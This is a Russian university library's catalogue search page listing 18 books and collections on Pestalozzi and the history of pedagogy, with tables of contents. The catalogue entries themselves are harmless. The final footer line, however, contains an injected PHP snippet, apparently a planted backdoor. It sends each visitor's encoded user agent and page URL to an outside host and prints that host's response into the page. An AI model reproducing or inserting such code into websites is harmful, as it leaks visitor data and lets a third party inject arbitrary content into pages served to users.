Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

123 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПЕСТАЛОЦЦИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 18
1. 
Песталоцци. Новиков. Карамзин. Ушинский. Корф : биографические повествования, 1997. - 522 с.
Ключевые слова 
2. 
Песталоцци / сост., авт. предисл. В. М. Кларин, 1998. - 224 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
3. 
Песталоцци / сост., авт. предисл. В. М. Кларин, 1998. - 224 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
4. 
Песталоцци. Новиков. Карамзин. Ушинский. Корф : биографические повествования, 1997. - 522 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Гуманитарное знание : проблемность и междисциплинарность : материалы 12-й международной научно-практической конференции (Бийск, 28 апреля 2010) : в 2-х ч.Ч. 1 / отв. ред. Л. Н. Уланская, 2010. - 94 с.
Оглавление 
  • Авдеева, Ю. В. К проблеме исследования отражения в речи измененных состояний сознания / Ю. В. Авдеева. - с.3. - Библиогр. в конце ст.
  • Богданович, О. А. Речевые этикетные формулы в современном китайском языке / О. А. Богданович. - с.6. - Библиогр. в конце ст.
  • Борисова, О. С. Особенности восприятия заимствованной лексики носителями русского языка / О. С. Борисова. - с.10
  • Бурнаева, К. А. Лексико-семантическая репрезентация микрополя "старость" в русском и английском языках / К. А. Бурнаева. - с.14. - Библиогр. в конце ст.
  • Виноградова, Наталья Григорьевна. Использование атрибутивных словосочетаний в рекламных текстах / Н. Г. Виноградова. - с.19. - Библиогр. в конце ст.
  • Геращенко, Александр Михайлович. Роль вертикального контекста в расширении информационного поля текста / ; А. А. Геращенко. - с.20. - Библиогр. в конце ст.
  • Гранкова, Наталья Николаевна. Дискурс, текст и речь в адаптивной характеристике сниженной лексики / Н. Н. Гранкова. - с.23. - Библиогр. в конце ст.
  • Исаева, Ирина Петровна. Процессы инциденции и декаденции в психомеханике глагольных форм / И. П. Исаева. - с.27. - Библиогр. в конце ст.
  • Коренева, Е. В. О некоторых лингвокультурных особенностях китайских эргонимов / Е. В. Коренева. - с.29. - Библиогр. в конце ст.
  • Коржнева, Елена Арнольдовна. Проблемы языковых контактов в Германии / Е. А. Коржнева, Е. С. Ляпунова. - с.33. - Библиогр. в конце ст.
  • Красноперова, Ю. В. Конверсационная тактика смены темы как способ реализации дискурсивных стратегий в интервью / Ю. В. Красноперова. - с.36. - Библиогр. в конце ст.
  • Кузьмина, Ирина Николаевна. Каузальность в реализации временного дискотинуума немецкого текста / И. Н. Кузьмина. - с.41. - Библиогр. в конце ст.
  • Легенкина, Валентина Игоревна. Проблема формирования фонографических соответствий при заимствовании иноязычного топонимического материала / В. И. Легенкина. - с.44. - Библиогр. в конце ст.
  • Наджафова, Рамила Вагифовна. Мифы о происхождении китайского письма / ; Р. В. Наджафарова. - с.46. - Библиогр. в конце ст.
  • Нефедова, Марина Павловна. Английская ментальность и языковое сознание при актуализации семантики "настроение" / М. П. Нефедова. - с.48. - Библиогр. в конце ст.
  • Панькина, Елена Владимировна. Иконическая составляющая языковой структуры на уровне текста / Е. В. Панькина. - с.52. - Библиогр. в конце ст.
  • Пивоварова, Юлия Юрьевна. Идентификация фазового компонента темпоральной семантики / Ю. Ю. Пивоварова. - с.54. - Библиогр. в конце ст.
  • Сокольникова, Светлана Николаевна. Топонимы русского и китайского языков в системно-структурном аспекте / С. Н. Сокольникова. - с.61. - Библиогр. в конце ст.
  • Тарасенко, В. В. Ретроспективный обзор исследований концептов "Жизнь и смерть" с точки зрения лингвистического подхода / В. В. Тарасенко. - с.64. - Библиогр. в конце ст.
  • Щелок, Татьяна Ивановна. Кодифицированные графические сокращения в русском языке и графическая вариативность / Т. И. Щелок. - с.69. - Библиогр. в конце ст.
  • Дегтярев, Денис Александрович. Рецепции Песталоцци в российской педагогике - 19 - 20 в.в. / Д. А. Дегтярев. - с.72. - Библиогр. в конце ст.
  • Деменкова, Надежда Дмитриевна. Роль аксиологического подхода в подготовке учителя иностранного языка / Н. Д. Деменкова. - с.76. - Библиогр. в конце ст.
  • Заякин, Олег Робертович. К педагогической терминологии И. Ф. Гербарта / О. Р. Заякин. - с.79. - Библиогр. в конце ст.
  • Лимачко, Галина Георгиевна. Проблема обучения грамматическому строю китайского языка / Г. Г. Лимачко, А. М. Геращенко. - с.81. - Библиогр. в конце ст.
  • Трофимова, Н. Г. Рейтинг преподавателя в вузе / Н. Г. Трофимова. - с.84. - Библиогр. в конце ст.
  • Хохлова, Елена Александровна. Интеграция проблемного, личностно-деятельностного и дифференцированного подходов в обучении иностранным языкам / Е. А. Хохлова. - с.87. - Библиогр. в конце ст.
Держатели документа (Информация об экземплярах) 
6. 
Гуманитарное знание : проблемность и междисциплинарность : материалы 13-й международной научно-практической конференции (Бийск, 28 апреля 2011) : в 2-х ч.Ч. 1 / отв. ред. Л. Н. Уланская, 2011. - 82 с.
Оглавление 
  • Ануфриева, Екатерина Васильевна. Гендер как исследовательская проблема / Е. В. Ануфриева. - с.3
  • Бартышева, Марина Павловна. Невербальная составляющая языкового потенциала семантики "настроение" в английском языке / М. П. Бартышева. - с.5
  • Виноградова, Наталья Григорьевна. Механизмы формализации средств оценочного значения / Н. Г. Виноградова. - с.9
  • Гранкова, Наталья Николаевна. Сниженная лексика как объект немецкого языкового пространства / Н. Н. Гранкова. - с.12
  • Донова, Олеся Владимировна. Национальная специфика фразеологии / О. В. Донова. - с.15
  • Исаева, Ирина Петровна. Концепт как феномен универсального и специфического / И. П. Исаева. - с.20
  • Козлова, Наталья Степановна. Способы выражения мнения автора в блоге / Н. С. Козлова. - с.22
  • Коржнева, Елена Арнольдовна. Особенности номинации блюд немецкой кухни / Е. А. Коржнева, Е. С. Ляпунова. - с.27
  • Красноперова, Юлия Валерьевна. Интервью как особый интерактивный речевой жанр в сфере массовой коммуникации / Ю. В. Красноперова. - с.31
  • Кузьмина, Ирина Николаевна. Временной дисконтинуум как способ увеличения объема актуальной информации / И. Н. Кузьмина. - с.35
  • Легенкина, Валентина Игоревна. Актуальные проблемы орфографии заимствованных имен собственных / В. И. Легенкина. - с.38
  • Липустина, Ольга Михайловна. Ирония / О. М. Липустина. - с.41
  • Пивоварова, Юлия Юрьевна. Репрезентация гендерных стереотипов в рекламном слогане / Ю. Ю. Пивоварова. - с.44
  • Рукалеева, Юлия Олеговна. Трансформация текста при пересказе / Ю. О. Рукалеева. - с.47
  • Сокольникова, Светлана Николаевна. Методы анализа и классифиакации топонимов / С. Н. Сокольникова. - с.49
  • Федяева, Анастасия Владимировна. Концепт "время" во фразеологии немецкого и русского языков / А. В. Федяева. - с.51
  • Чеснокова, Рената Анатольевна. Глагольные лексемы семантики "повторяемость" в английском языке / Р. А. Чеснокова. - с.53
  • Щелок, Татьяна Ивановна. Соотнесенность предлогов и префиксов в современном немецком языке / Т. И. Щелок, А. Ю. Колокольникова. - с.55
  • Дегтярев, Денис Александрович. Влияние Песталоцци на русских педагогов 60-х годов XIX века / Д. А. Дегтярев. - с.61
  • Деменкова, Надежда Дмитриевна. Использование текстовых технологий в обучении иностранному языку в языковом вузе / Н. Д. Деменкова. - с.68
  • Лимачко, Галина Георгиевна. Использование образности в обучении китайской письменности / Г. Г. Лимачко, А. М. Геращенко. - с.70
  • Прокопович, Елена Николаевна. Здоровьесберегающие технологии в обучении иностранным языкам / Е. Н. Прокопович. - с.73
  • Семенова, Софья Станиславовна. Особенности системы образования в Китае / С. С. Семенова. - с.76
Держатели документа (Информация об экземплярах) 
7. 
Рецепция Песталоцци в русской педагогике конца XIX - начала XX вв. : хрестоматия по истории педагогики / сост. Д. А. Дегтярев, 2011. - 154 с.
Держатели документа (Информация об экземплярах) 
8. 
Педагогическое наследие : Я. А. Коменский, Д. Локк, Ж.-Ж. Руссо, И. Г. Песталоцци / сост.: В. М. Кларин, А. Н. Джуринский, 1989. - 417 с.
Оглавление 
  • Коменский, Ян Амос. Великая дидактика / Я. А. Коменский. - с.11
  • Коменский, Ян Амос. Всеобщего совета об исправлении дел человеческих / Я. А. Коменский. - с.107
  • Локк, Джон. Мысли о воспитании / Д. Локк. - с.145
  • Локк, Джон. Об управлении разумом / Д. Локк. - с.179
  • Руссо, Жан Жак. Эмиль, или О воспитании / Ж. Ж. Руссо. - с.194
  • Песталоцци, Иоганн Генрих. Письма г-на Песталоцци к г-ну Н. Э. Ч. о воспитании бедной сельской молодежи / И. Г. Песталоцци. - с.304
  • Песталоцци, Иоганн Генрих. О народном образовании и индустрии / И. Г. Песталоцци. - с.312
  • Песталоцци, Иоганн Генрих. Метод / И. Г. Песталоцци. - с.322
  • Песталоцци, Иоганн Генрих. Памятная записка парижским друзьям о сущности и цели метода / И. Г. Песталоцци. - с.331
  • Песталоцци, Иоганн Генрих. Памятная записка о семинарии в кантоне Во / И. Г. Песталоцци. - с.341
  • Песталоцци, Иоганн Генрих. Лебединая песня / И. Г. Песталоцци. - с.356
Держатели документа (Информация об экземплярах) 
9. 
Песталоцци, Иоганн Генрих. Статьи и отрывки из педагогических сочинений / И. Г. Песталоцци ; ред., вступ. ст. Н. А. Желваков, 1939. - 112 с.
Оглавление 
  • Желваков, Н. А. Песталоцци, его деятельность и педагогическое учение / Н. А. Желваков. - с.3
  • Просьба к друзьям человечества и доброжелателям о милостивой поддержке учреждения, имеющего задачей дать бедным детям воспитание и работу в загородной местности. - с.18
  • Лингард и Гертруда. - с.22
  • Письмо о пребывании в Станце. - с.38
  • Как Гертруда учит своих детей. - с.62
  • О возникших в Ивердоне затруднениях согласовать умственное развитие детей с их нравственным воспитанием. - с.101
  • Лебединая песнь Песталоцци. - с.106
Держатели документа (Информация об экземплярах) 
10. 
Песталоцци, Иоганн Генрих. Статьи и отрывки из педагогических сочинений / И. Г. Песталоцци ; ред., вступ. ст. Н. А. Желваков, 1939. - 112 с.
Оглавление 
  • Желваков, Н. А. Песталоцци, его деятельность и педагогическое учение / Н. А. Желваков. - с.3
  • Просьба к друзьям человечества и доброжелателям о милостивой поддержке учреждения, имеющего задачей дать бедным детям воспитание и работу в загородной местности. - с.18
  • Лингард и Гертруда. - с.22
  • Письмо о пребывании в Станце. - с.38
  • Как Гертруда учит своих детей. - с.62
  • О возникших в Ивердоне затруднениях согласовать умственное развитие детей с их нравственным воспитанием. - с.101
  • Лебединая песнь Песталоцци. - с.106
11. 
Коменский, Ян Амос. Педагогическое наследие [Текст] : сборник / Я. А. Коменский, Д. Локк, Ж.-Ж. Руссо, И. Г. Песталоцци; Сост. В. М. Кларин, 1988. - 412 с.
Ключевые слова 
Оглавление 
  • Коменский, Ян Амос. Великая дидактика / Я. А. Коменский. - с.11
  • Коменский, Ян Амос. Всеобщего совета об исправлении дел человеческих / Я. А. Коменский. - с.107
  • Локк, Джон. Мысли о воспитании / Д. Локк. - с.145
  • Локк, Джон. Об управлении разумом / Д. Локк. - с.179
  • Руссо, Жан Жак. Эмиль, или О воспитании / Ж. Ж. Руссо. - с.194
  • Песталоцци, Иоганн Генрих. Письма г-на Песталоцци к г-ну Н. Э. Ч. о воспитании бедной сельской молодежи / И. Г. Песталоцци. - с.304
  • Песталоцци, Иоганн Генрих. О народном образовании и индустрии / И. Г. Песталоцци. - с.312
  • Песталоцци, Иоганн Генрих. Метод / И. Г. Песталоцци. - с.322
  • Песталоцци, Иоганн Генрих. Памятная записка парижским друзьям о сущности и цели метода / И. Г. Песталоцци. - с.331
  • Песталоцци, Иоганн Генрих. Памятная записка о семинарии в кантоне Во / И. Г. Песталоцци. - с.341
  • Песталоцци, Иоганн Генрих. Лебединая песня / И. Г. Песталоцци. - с.356
12. 
История социальной педагогики [Текст] : Учеб. для вузов по специальности "Социальная работа" / В. И. Беляев, Т. А. Дубровская, Н. Н. Петрикова и др.; Под ред. В. И. Беляева, 2003. - 255 с.

Предпринята первая попытка создания систематического курса истории социальной педагогики за рубежом. Авторы не ограничиваются рамками историко-педагогического исследования, а предлагают решение некоторых проблем социальной педагогики, имеющих важное теоретико-методологическое значение для ее развития, - определение объекта и предмета социальной педагогики, вариантов формулировки ее основных дефиниций и др.

Для студентов вузов, обучающихся по направлению подготовки и специальности "Социальная работа".

13. 
Жизнь замечательных людей [Текст] : В 3 т. / Под общ. ред. А. В. Овчинникова. Т. 2 : XVII - XVIII вв, 2001. - 796, [3] с.
Ключевые слова 
ПЕРСОНАЛИИ -- ФРАНКЛИН -- ЛИННЕЙ -- ЛАПЛАСА -- ЭЙЛЕРА -- КАНТЕМИР -- ЛОМОНОСОВ -- ЮМ -- РУССО -- ДИДРО -- ГАРРИК -- СМИТ -- КАНТ -- ВОЛКОВ -- ЛЕССИНГ -- СУВОРОВ -- БОМАРШЕ -- ВАШИНГТОН -- УАТТ -- ПОТЕМКИН -- ДЕРЖАВИН -- ЛАВУАЗЬЕ -- ДАШКОВА -- РОТШИЛЬД -- ФОНВИЗИН -- НОВИКОВ -- ПЕСТАЛОЦЦИ -- ГЕТЕ -- МОЦАРТ -- ШИЛЛЕР -- МАЛЬТУС -- КАРАМЗИН -- НАПОЛЕОН -- КРЫЛОВ -- КЮВЬЕ -- ГУМБОЛЬДТ -- БЕТХОВЕН -- ГЕГЕЛЬ -- СКОТТ -- СПЕРАНСКИЙ -- МЕТТЕРНИХ -- КАНКРИН -- БЕРАНЖЕ -- ОУЭН -- ЖУКОВСКИЙ -- БАЙРОН -- ШОПЕНГАУЭР -- ГРИБОЕДОВ -- АКСАКОВ -- ФАРАДЕЙ -- ЛОБАЧЕВСКИЙ -- БЭР -- СТРУВЕ -- КАРЛЕЙЛЬ -- Лаплас -- Эйлер -- Говард -- Беккариа -- Бентам -- Кондорсе -- Дженнер -- Мирабо -- Каразин -- Стефенсон -- Фултон -- Дагер -- Ньепс -- Щепкин -- Мейербер -- Кетле
Держатели документа (Информация об экземплярах) 
14. 
Абрамов Я. В. Песталоцци [Текст] : его жизнь и пед. деятельность / Я. В. Абрамов, 1893. - 88 с.
Держатели документа (Информация об экземплярах) 
15. 
Песталоцци. Новиков. Каразин. Ушинский. Корф [Текст] : биогр. повествования / сост., ред. Н. Ф. Болдырев, 1997. - 523 с.
Оглавление 
  • Абрамов, Я. В. И. Г. Песталоцци / Я. В. Абрамов
  • Усова, С. Е. Николай Новиков / С. Е. Усова
  • Абрамов, Я. В. Василий Каразин / Я. В. Абрамов
  • Песковский, М. Л. Константин Ушинский / М. Л. Песковский
  • Песковский, М. Л. Барон Николай Корф / М. Л. Песковский
Держатели документа (Информация об экземплярах) 
16. 
Мудрость воспитания : книга для родителей / сост.: Б. М. Бим-Бад, Э. Д. Днепров, Г. Б. Корнетов, 1989. - 304 с.
Оглавление 
  • Коммунисты изменяют характер общественного воспитания ( К. Маркс, Ф. Энгельс ). - с.6
  • Будущее человечества всецело зависит от воспитания трудящихся ( К. Маркс ). - с.7
  • Всестороннее применение всесторонне развитых способностей ( Ф. Энгельс ). - с.8
  • Учиться коммунизму ( В. И. Ленин ). - с.9
  • "Не должна пропасть ни одна сила, ни одно дарование" ( Н. К. Крупская ). - с.11
  • Полное развитие личности на коллективной основе ( А. В. Луначарский ). - с.12
  • Введение в благородный круг мыслителей ( К. Д. Ушинский ). - с.17
  • Значение теории для практики воспитания ( Г. Спенсер ). - с.19
  • Прежде узнать , потом воспитывать ( К. Д. Ушинский ). - с.22
  • Что могут дать матерям науки о человеке ( Н. В. Шелгунов ). - с.22
  • Педагогическая культура родителей ( В. А. Сухомлинский ). - с.24
  • "Женщина не рождается педагогом..." ( К. Цеткин ). - с.26
  • Никакая книга не заменит собственной живой мысли ( Я. Корчак )
  • Человек и исторически накопленная культура ( А. Н. Леонтьев ). - с.31
  • Когда рождается личность ( Э. В. Ильенков ). - с.33
  • Генетическая программа и черты личности ( Н. П. Дубинин )
  • Последствия изоляции ребенка от общества ( Б. Ф. Поршнев ). - с.37
  • Что определяет степень развития ребенка ( А. В. Луначарский ). - с.39
  • Причины различий между людьми, лежащие в их природном складе ( Ж.-Ж. Руссо ). - с.40
  • Причины различий между людьми, лежащие в их воспитании ( К. А. Гельвеций ). - с.42
  • Роль впечатлений детства в судьбе человека : один из примеров ( С. В. Ковалевская ). - с.45
  • Целая долгая жизнь ( Г. К. Честертон ). - с.46
  • Воспитанием решается участь человека ( В. Г. Белинский ). - с.53
  • Воспитатель ведет за собой на помочах будущие светила ( И. П. Ф. Рихтер ). - с.58
  • Душа мира ( А. П. Платонов ). - с.59
  • Что такое разумная родительская любовь ( Ж.-Ж. Руссо ). - с.61
  • Бескорыстная родительская любовь ( В. Я. Стоюнин ). - с.66
  • Любовь передается по наследству ( Г. Н. волков ). - с.67
  • Детская любовь и сочувствие против жадности и жестокости ( Б. Рассел ). - с.70
  • Соответствие между словом и делом в воспитании ( П. Ф. Лесгафт ). - с.76
  • Сила подражания ( В. П. Вахтеров ). - с.76
  • "Вы воспитываете его в каждый момент вашей жизни" ( А. С. Макаренко ). - с.78
  • Нет прощения, нет оправдания, нет искупления жестокости ( Ф. М. Достоевский ). - с.80
  • Виды родительского авторитета и их воспитательное значение ( А. С. Макаренко ). - с.82
  • Воспитание других включается в воспитание себя ( Л. Н. Толстой ). - с.87
  • "В течение всей жизни" ( А. Сен-Симон ). - с.89
  • О силе привычки ( Ф. Бэкон ). - с.90
  • Темное и скромное происхождение павлуш чичиковых ( Н. в. Гоголь ). - с.91
  • От младенца до подростка ( Л. С. Выготский ). - с.95
  • Стадии развития психики ребенка ( А. Н. Лентьев ). - с.97
  • Уважать и понимать особенности возраста воспитанников! ( П. Ф. Каптерев ). - с.100
  • Воспитание в раннем детстве ( В. М. Бехтерев ). - с.101
  • "Сущность человечности развивается только при наличии покоя" ( И. Г. Песталоцци ). - с.103
  • "Закупоренный кратер вулкана" ( Ш. А. Амонашвили ). - с.105
  • Понимать язык плача и смеха! ( Я. Корчак ). - с.106
  • Первые упражнения для развития внешних чувств ( А. Я. Герд ). - с.108
  • Ведущая деятельность "школьного" возраста - учение ( Д. Б. Эльконин ). - с.109
  • Доверие к детскому уму ( Н. Г. Чернышевский ). - с.110
  • Кризис "школьного" возраста ( Я. Корчак ). - с.111
  • Отрочество и его тревоги ( В. А. Сухомлинский ). - с.113
  • Самосознание подростка ( Ю. П. Азаров ). - с.121
  • Подростки и любовь ( Я. Корчак ). - с.124
  • "Что я считаю началом юности" ( Л. Н. Толстой ). - с.126
  • Слагаемые призвания ( К. А. Гельвеций ). - с.127
  • Юношеская влюбленность ( М. М. Рубинштейн ). - с.129
  • "Сызмальства учить ненавидеть дурное!" ( М. Монтень ). - с.137
  • Истоки нравственности в ребенке ( С. Л. Соловейчик ). - с.138
  • Упражнять детей в нравственности и добродетелях ( Я. А. Коменский ). - с.144
  • Воспитание добродушия ( П. Ф. Лесгафт ). - с.146
  • Учите терпению в страдании, бодрости в несчастии, мужеству в правом деле ( Н. И. Новиков ). - с.149
  • Прочные основы характера ( И. Кант ). - с.151
  • Все это заставляет взрослого быть очень последовательным ( П. Ф. Лесгафт ). - с.155
  • Режим - это только средство ( А. С. Макаренко ). - с.158
  • Воспитание ответственности ( Х. Д. Джайнотт ). - с.162
  • "Источники всего хорошего лежат в игре и исходят из нее" ( Фр. Фребель ). - с.166
  • Игра будит ум и воображение ( Е. А. Аркин ). - с.167
  • Как научить любить прекрасное ( Д. И. Писарев ). - с.171
  • "Прекрасное пробуждает доброе" ( Д. Б. Кабалевский ). - с.174
  • "Пусть они будут муравьями..." ( Я. А. Коменский ). - с.176
  • Облагораживающий труд ( А. С. Макренко ). - с.177
  • Наказание - воспитание или месть? ( Л. Н. Толстой ). - с.180
  • Творческий производительный труд как метод воспитания ( К. Н. Вентцель ). - с.181
  • Азбука гражданского воспитания ( Ю. П. Азаров ). - с.184
  • Откуда у хороших родителей плохие дети? ( Симеон Полоцкий ). - с.189
  • Много пап и мам, но мало отцов и матерей ( В. Г. Белинский ). - с.189
  • Корень воспитательной порчи заключается именно в чадолюбии ( Н. В. Шелгунов ). - с.194
  • Семейная среда и реакция ребенка на нее ( Я. Корчак ). - с.197
  • "Облегченное" воспитание ( Ф. М. Достоевский ). - с.200
  • Авторитароное воспитание ( Н. А. Добролюбов ). - с.201
  • Уберечь от эгоизма ( В. А. Сухомлинский ). - с.205
  • Побои, награды, регламентации ( Д. Локк ). - с.207
  • Не наказывать, не хвалить, а... ( Л. А. Никитина ). - с.211
  • Капризы и упрямство ( Е. А. Аркин ). - с.212
  • Не надо пугать детей ( С. Т. Шацкий ). - с.218
  • Борьба со страхами ( П. Ф. Каптерев ). - с.220
  • Только не притворство, не ложь! ( Н. И. Пирогов ). - с.223
  • О корнях нравственного иждевенчества ( В. А. Сухомлинский ). - с.226
  • Трудные характеристики ( В. П. Кащенко, Г. В. Мурашев ). - с.227
  • Профилактика нервных срывов ( А. Н. Чехова ). - с.232
  • Проблема "вундеркинда" ( А. В. Петровский ). - с.235
  • "Не станем напрасно терять времени..." ( Квинтилиан ). - с.241
  • Крайности раннего обучения ( В. Ф. Одоевский ). - с.243
  • Мыслить смолоду ( Э. В. Ильенков ). - с.245
  • Тренировка мыслительных способностей ( И. Г. Фихте ). - с.248
  • Отличие труда от игры ( И. Кант ). - с.250
  • В игре перед детьми раскрывается мир. - с.251
  • Учитесь спрашивать ( А. И. Герцен ). - с.252
  • Приохочивать, а не приневоливать к учению ( Д. И. Писарев ). - с.253
  • Первейший инструмент развития природных дарований ( Я. А. Коменский ). - с.256
  • Образование - это понимание к жизни ( Дж. Рёскин ). - с.258
  • Что такое образованный, интеллигентный человек ( Н. А. Рубакин ). - с.259
  • "Ленивый ученик?" - Нет, гениальный поэт ( Н. Г. Чернышевский ). - с.263
  • Потребность в книге ( Ш. А. Амонашвили ). - с.264
  • Дать ребенку веру в сои силы ( В. П. Вахтеров ). - с.266
  • "Бездарные" и "бестолковые" ученики ( Н. А. Добролюбов ). - с.267
  • Как помогать детям в учебе ( К. В. Бардин ). - с.270
  • Подтянуть трудного ученика ( В. А. Сухомлинский ). - с.273
  • Овладеть профессией ученика ( Ш. А. Амонашвили ). - с.276
  • Успехи в учении и сила товарищества ( И. П. Иванов ). - с.280
  • Семья и школа : навстречу друг другу ( Л. А. Кассиль ). - с.281
  • В семье Карла Маркса ( П. Лафарг ). - с.285
  • Различия во влиянии матери и отца на их детей ( А. Н. Острогорский ). - с.286
  • Служение семье и служение обществу ( Л. Н. Толстой ). - с.288
  • Семья - школа понимания общества ( А. П. Платонов ). - с.288
  • Семейная жизнь для ребенка то же, что для нас общественная ( А. Н. Острогорский ). - с.290
  • Семейная среда и жизненный путь ребенка ( И. С. Кон ). - с.291
  • В одной семье - два поколения воспитателей (А. В. Петровский ). - с.294
  • Целый огромный мир и я, родитель (С. Л. Соловейчик ). - с.298
  • Попытаемся же воспитать из наших детей новое человечество!" ( М. Горький ). - с.298
Держатели документа (Информация об экземплярах) 
17. 
История зарубежной дошкольной педагогики : хрестоматия : учебное пособие для пед. институтов по специальности "Дошкольная педагогика и психология" / сост.: Н. Б. Мчелидзе, А. А. Лебеденко, А. А. Гребенщикова, 1986. - 420 с.
Оглавление 
  • Демокрит. Изречения Демокрита / Демокрит. - с.9
  • Платон. Законы. Книга седьмая / Платон. - с.14
  • Аристотель. Политика / Аристотель. - с.22
  • Квинтилиан, Марк Фабий. Наставление оратору / Квинтилиан Марк Фабий. - с.25
  • Иероним, (Блаженный). Письмо к Лете / Иероним(Блаженный). - с.33
  • Кампанелла, Томмазо. Город Солнца / Т. Кампанелла. - с.35
  • Коменский, Ян Амос. Материнская школа / Я. А. Коменский. - с.43
  • Коменский, Ян Амос. Мир чувственных вещей в картинках... / Я. А. Коменский. - с.67
  • Локк, Джон. Мысли о воспитании / Д. Локк. - с.73
  • Руссо, Жан Жак. Юлия, или Новая Элоиза / Ж. Ж. Руссо. - с.89
  • Руссо, Жан Жак. Эмиль, или О воспитании / Ж. Ж. Руссо. - с.102
  • Песталоцци, Иоганн Генрих. Дневник Песталоцци о воспитании его сына / И. Г. Песталоцци. - с.133
  • Песталоцци, Иоганн Генрих. Как Гертруда учит своих детей. Попытка дать матерям наставление, как самим обучать своих детей / И. Г. Песталоцци. - с.144
  • Песталоцци, Иоганн Генрих. Книга матерей, или Руководство для матерей, как им научить своих детей наблюдать и говорить / И. Г. Песталоцци. - с.155
  • Песталоцци, Иоганн Генрих. Метод. Памятная записка Песталоцци / И. Г. Песталоцци. - с.159
  • Базедов, Иоганн Бернгард. Элементарное руководство / И. Б. Базедов. - с.165
  • Оберлин, Иоганн Фридрих. Иоганн Фридрих Оберлин Национальному Конвенту / И. Ф. Оберлин. - с.171
  • Оберлин, Иоганн Фридрих. Из устава Оберлиновских учреждений / И. Ф. Оберлин. - с.174
  • Уильдерспин, Самуил. Воспитание маленьких детей или о важности воспитания детей бедняков / С. Уильдерспин. - с.174
  • Фребель, Фридрих. Воспитание человека / Ф. Фребель. - с.188
  • Фребель, Фридрих. Детский сад / Ф. Фребель. - с.207
  • Фурье, Франсуа Мари Шарль. Новый хозяйственный и социетарный мир, или Открытие способа привлекательного и природосообразного труда, распределенного в сериях по страсти / ; Ш. Фурье. - с.241
  • Оуэн, Роберт. Завещание Р. Оуэна человечеству / ; Р. Ойэн. - с.264
  • Оуэн, Роберт. Революция в сознании и деятельности человеческого рода, или Грядущий переход от неразумия к разумности / Р. Оуэн. - с.267
  • Оуэн, Роберт. Книга о новом нравственном мире / Р. Оуэн. - с.271
  • Оуэн, Роберт. Педагогическая практика / Р. Оуэн. - с.276
  • Оуэн, Роберт. Новое существование человека на земле / Р. Оуэн. - с.280
  • Оуэн, Роберт. Из последнего произведения Р. Оуэна "Жизнь Роберта Оуэна, написанная им самим" (т. 1) / Р. Оуэн. - с.281
  • Оуэн, Роберт. Очерк о посещении Нью-Ланарка в августе 1822 г. / Р. Оуэн. - с.286
  • Маркс, Карл. Дебаты шестого рейнского ландтага / К. Маркс. - с.293
  • Энгельс, Фридрих. Положение рабочего класса в Англии / Ф. Энгельс. - с.294
  • Энгельс, Фридрих. Принципы коммунизма / Ф. Энгельс. - с.308
  • Маркс, Карл. Манифест Коммунистической партии / К. Маркс, Ф. Энгельс. - с.310
  • Маркс, Карл. Капитал, т. 1 / К. Маркс. - с.314
  • Энгельс, Фридрих. Анти-Дюринг / Ф. Энгельс. - с.321
  • Энгельс, Фридрих. Развитие социализма от утопии к науке / Ф. Энгельс. - с.321
  • Декларация общества "Новое воспитание". - с.327
  • Двенадцатый округ. - с.328
  • Обращение мэрии XVIII округа к директорам и директрисам школ XVIII округа. - с.329
  • Мэрия III округа. - с.330
  • Дети Коммуны. - с.330
  • Ясли. - с.331
  • Дьюи, Джон. Школа и общество / Д. Дьюи. - с.338
  • Дьюи, Джон. Школа и ребенок / Д. Дьюи. - с.339
  • Дьюи, Джон. Школы будущего / Д. Дьюи, Э. Дьюи. - с.345
  • Кергомар, Полина. Дошкольное воспитание и детские сады во Франции / П. Кергомар. - с.352
  • Монтессори, Мария. Метод научной педагогики, применяемый к детскому воспитанию в Домах ребенка / М. Монтессори. - с.378
  • Декроли, Овид. Школа и воспитание / О. Декроли. - с.413
  • Декроли, Овид. Возбуждение интеллектуальной и двигательной активности посредством воспитательных игр / О. Декроли. - с.419
  • Цеткин, Клара. Интеллигентный пролетариат, женский вопрос и социализм / К. Цеткин. - с.428
  • Цеткин, Клара. Женщина и ее экономическое положение / К. Цеткин. - с.431
  • Цеткин, Клара. Школьный вопрос и рабочий класс / К. Цеткин. - с.441
  • Бебель, Август. Женщина и социализм / А. Бебель. - с.446
Держатели документа (Информация об экземплярах) 
18. 
Коротов, Виктор Михайлович. Введение в педагогику [Текст] / В. М. Коротов, 1999. - 256 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3082 - 17.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.92 с.12 запросов, 0.54c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;